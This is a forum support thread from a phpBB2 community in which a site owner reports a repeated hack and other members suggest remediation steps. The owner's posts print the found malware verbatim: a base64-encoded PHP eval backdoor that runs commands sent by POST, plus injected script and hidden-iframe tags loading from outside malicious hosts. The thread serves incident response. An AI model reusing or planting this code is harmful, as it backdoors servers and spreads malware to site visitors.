phpBB2Refugees.com Logo
Not affiliated with or endorsed by the phpBB Group

Register •  Login 

Continue the legacy...

Welcome to all phpBB2 Refugees!Wave Smilie

This site is intended to continue support for the legacy 2.x line of the phpBB2 bulletin board package. If you are a fan of phpBB2, please, by all means register, post, and help us out by offering your suggestions. We are primarily a community and support network. Our secondary goal is to provide a phpBB2 MOD Author and Styles area.

I got hacked... Again!


 
Search this topic... | Search General Support... | Search Box
Register or Login to Post    Index » General Support  Previous TopicPrint TopicNext Topic
Author Message
Sylver Cheetah 53
Board Member



Joined: 17 Dec 2008

Posts: 426
Location: Milky Way


flag
PostPosted: Mon Jul 26, 2010 4:17 am 
Post subject: I got hacked... Again!

Please... My forum does not work anymore. icon_cry.gif
It says:
phpBB : Critical Error

Could not query config information

DEBUG MODE

SQL Error : 1146 Table 'friendcc_phpbb.CONFIG_TABLE' doesn't exist

SELECT * FROM CONFIG_TABLE

Line : 215
File : common.php

Also, I get a virus alert when trying to access it. icon_sad.gif
Please, help...
My forum is www.friendsforever.co.cc

_________________
Image link
My Forum || My Blog

phpBB2 forever! icon_smile.gif
Back to top
Sylver Cheetah 53
Board Member



Joined: 17 Dec 2008

Posts: 426
Location: Milky Way


flag
PostPosted: Mon Jul 26, 2010 4:34 am 
Post subject: Re: Could not query config information

Probably, I've been hacked. At the begging of index.php I've found this strange code:
Code:
<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnazlvbnYnKSl7ZnVuY3Rpb24gazlvbnYoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMM1JvWld4bFlYSnVhVzVuWTJGdWRtRnpMbU52YlM5cGJtUmxlRjltYVd4bGN5OW1jQzV3YUhBZ1Bqd3ZjMk55YVhCMFBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIGs5b252MigkYSwkYiwkYywkZCl7Z2xvYmFsJGs5b252MTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkazlvbnYxKSljYWxsX3VzZXJfZnVuYygkazlvbnYxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdrOW9udicpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2s5b252Jyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGs5b252bD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignazlvbnYyJykpIT0nazlvbnYyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?><?php

And this is my logs file: http://friendsforever.co.cc/files/ftp.friendsforever.co.cc-ftp_log
Damn. icon_sad.gif


LATER EDIT: I've replaced some files, mostly from "includes" folder, and now the forum is working, but there are at least still two isues:
1.I still get the virus alert. Where could the virus be? I want it found and killed!
2.BB codes not showing up. I get the following error message:
Parse error: syntax error, unexpected '<' in /home/friendcc/public_html/includes/bbcode.php(61) : eval()'d code on line 24
I've replace the file but still same errror...


LATER EDIT: I've found a script in index.html files:
Code:
<script src=http://thelearningcanvas.com/index_files/fp.php ></script><body><iframe src="http://q1m.ru:8080/index.php" width=169 height=161 style="visibility: hidden"></iframe>

And this was in bbcode.tpl:
Code:
<script src=http://thelearningcanvas.com/index_files/fp.php ></script>

_________________
Image link
My Forum || My Blog

phpBB2 forever! icon_smile.gif
Back to top
Acaria
Board Member



Joined: 20 Feb 2009

Posts: 238



PostPosted: Tue Jul 27, 2010 12:56 am 
Post subject: Re: Could not query config information

What kind of CPanel does your host use? I'd contact them immediately about these recurring issues you have with hackers. It's obviously fault on their end, because such constant and malicious hacking cannot come from PhpBB2. It would have been discovered, abused, and fixed by now.
Back to top
Sylver Cheetah 53
Board Member



Joined: 17 Dec 2008

Posts: 426
Location: Milky Way


flag
PostPosted: Tue Jul 27, 2010 6:08 am 
Post subject: Re: Could not query config information

They say phpBB is no good... But that's what they always say.

I see there... cPanel Pro 1.0 RC1. Not sure if that's the one, but this is what I see.
Anyway... Yesterday I was replacing compromised files, but the were hacked again only a few hours later. Ever if I changed the password. Let see what happenes today. icon_sad.gif
Strangely, the last time I was hacked it was on 25 july 2009. And now... 25 july 2010. icon_confused.gif
Google is now showing a warning on my website... That it has malware. Damn! icon_sad.gif


LATER EDIT: By the way. What's with this errors:
Code:
Warning: Cannot modify header information - headers already sent by (output started at /home/friendcc/public_html/config.php:16) in /home/friendcc/public_html/includes/sessions.php  on line 366

Warning: Cannot modify header information - headers already sent by (output started at /home/friendcc/public_html/config.php:16) in /home/friendcc/public_html/includes/sessions.php on line 367

Warning: Cannot modify header information - headers already sent by (output started at /home/friendcc/public_html/config.php:16) in /home/friendcc/public_html/includes/functions.php on line 1054

Warning: Cannot modify header information - headers already sent by (output started at /home/friendcc/public_html/config.php:16) in /home/friendcc/public_html/includes/page_header.php on line 621

Warning: Cannot modify header information - headers already sent by (output started at /home/friendcc/public_html/config.php:16) in /home/friendcc/public_html/includes/page_header.php on line 627

Warning: Cannot modify header information - headers already sent by (output started at /home/friendcc/public_html/config.php:16) in /home/friendcc/public_html/includes/page_header.php on line 628

I replaced config.php, sessions.php, functions.php and page_header.php. icon_rolleyes.gif

_________________
Image link
My Forum || My Blog

phpBB2 forever! icon_smile.gif
Back to top
dogs and things
Board Member



Joined: 18 Nov 2008

Posts: 628
Location: Spain


flag
PostPosted: Tue Jul 27, 2010 6:52 am 
Post subject: Re: Could not query config information

Have a look at http://blog.unmaskparasites.com/category/website-exploits/

Read the articles, probably you can find some good info there that can help you and your friend to find out what is wrong on the server-side.

_________________
phpBB2 will never die, I hope!
Back to top
Slackervaara
Board Member



Joined: 01 Jan 2009

Posts: 70



PostPosted: Wed Jul 28, 2010 12:51 am 
Post subject: Re: I got hacked... Again!

The hacker might have got your ftp-password via keylogger and introduced a script on your site and thats why you are so rapidly hacked again. To protect myself from this I use:

NoScript as AddOn to avoid downloading key loggers or spyware.

Keepass Password Safe to avoid writing passwords on each time I use Ftp (good if the site is infected with spyware)

To use Linux as OS on your PC is also a protection against spyware.

It is important for you to check your PC with antivirus software to find the spyware on your PC.

If you have an exact copy of your site on your PC you could try to compare those files with the files on the site which could be made with FileZilla. You might then find the malicious script.

After that change your ftp-password on another PC.

Then you must find the spyware on your PC.
Back to top
dogs and things
Board Member



Joined: 18 Nov 2008

Posts: 628
Location: Spain


flag
PostPosted: Wed Jul 28, 2010 6:46 am 
Post subject: Re: I got hacked... Again!

It is also possible that the server is infected through another website's ftp user/password. Another site hosted on the same server.
_________________
phpBB2 will never die, I hope!
Back to top
lumpy burgertushie
Board Member



Joined: 18 Nov 2008

Posts: 266


flag
PostPosted: Thu Jul 29, 2010 4:12 pm 
Post subject: Re: I got hacked... Again!

that is the most likely .

this is an old hack that is usually on the server side.
go into your ftp and check every folder for any files that are dated the same as the files that are hacked and get rid of them.

it will be in every index file on the server most likely.

and possibly other files as well.

I would delete all of your files on the server and upload a backup copies if you have them.

otherwise, take the time to check every single file if you have to.

then seriously consider changing hosts.


robert
Back to top
Holger
Board Member



Joined: 19 Jan 2009

Posts: 509
Location: Hanover


flag
PostPosted: Mon Aug 09, 2010 4:15 am 
Post subject: Re: I got hacked... Again!

We had such a case some years ago.
The hackers had placed a script somewhere hidden in the folders. That script was run automatically by calling the URL from "outside" and it edited all the HTML-files on the server.
Back to top
Display posts from previous:   
Register or Login to Post    Index » General Support  Previous TopicPrint TopicNext Topic
Page 1 of 1 All times are GMT - 4 Hours
 
Jump to:  

Index • About • FAQ • Rules • Privacy • Search •  Register •  Login 
Not affiliated with or endorsed by the phpBB Group
Powered by phpBB2 © phpBB Group
Generated in 0.0649 seconds using 16 queries. (SQL 0.0138 Parse 0.0008 Other 0.0503)
phpBB Customizations by the phpBBDoctor.com
Template Design by DeLFlo and MomentsOfLight.com Moments of Light Logo